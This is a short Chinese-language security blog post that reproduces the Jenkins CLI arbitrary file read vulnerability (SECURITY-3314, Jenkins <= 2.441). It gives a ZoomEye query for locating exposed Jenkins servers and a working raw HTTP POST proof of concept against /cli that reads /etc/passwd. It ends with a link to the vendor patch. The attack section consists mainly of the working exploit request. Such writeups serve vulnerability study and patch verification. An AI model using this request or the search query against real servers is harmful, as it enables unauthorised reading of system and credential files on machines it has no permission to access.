0x00写在前面

本次测试仅供学习使用,如若非法他用,与本平台和发布者无关,需自行负责!

0x01漏洞介绍

Jenkins是Jenkins开源的一个应用软件。一个开源自动化服务器Jenkins提供了数百个插件来支持构建,部署和自动化任何项目。

Jenkins 2.441及之前版本、LTS 2.426.2及之前版本存在安全漏洞,该漏洞源于允许未经身份验证的攻击者读取Jenkins控制器文件系统。

0x02影响版本

Jenkins <= 2.441 

Jenkins <= LTS 2.426.2

0x03漏洞复现

zoomeye语法

zoomeye语法  app:"Jenkins"

1.访问漏洞环境

2.对漏洞进行复现

 POC (POST)

漏洞复现

POST /cli?remoting=false HTTP/1.1
Host: 127.1.231.87
Accept-Encoding: identity
Content-Length: 57
Session: 44ae3a15-9ae2-4459-a3b8-e8daefe2cc53
Side: upload
Content-type: application/octet-stream

.......help.......@/etc/passwd.......GBK.......zh_CN.....

测试etc/passwd(漏洞存在)


3.nuclei工具测试(漏洞存在)


4.xpoc工具测试(漏洞存在)


5.python脚本测试(漏洞存在)

0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314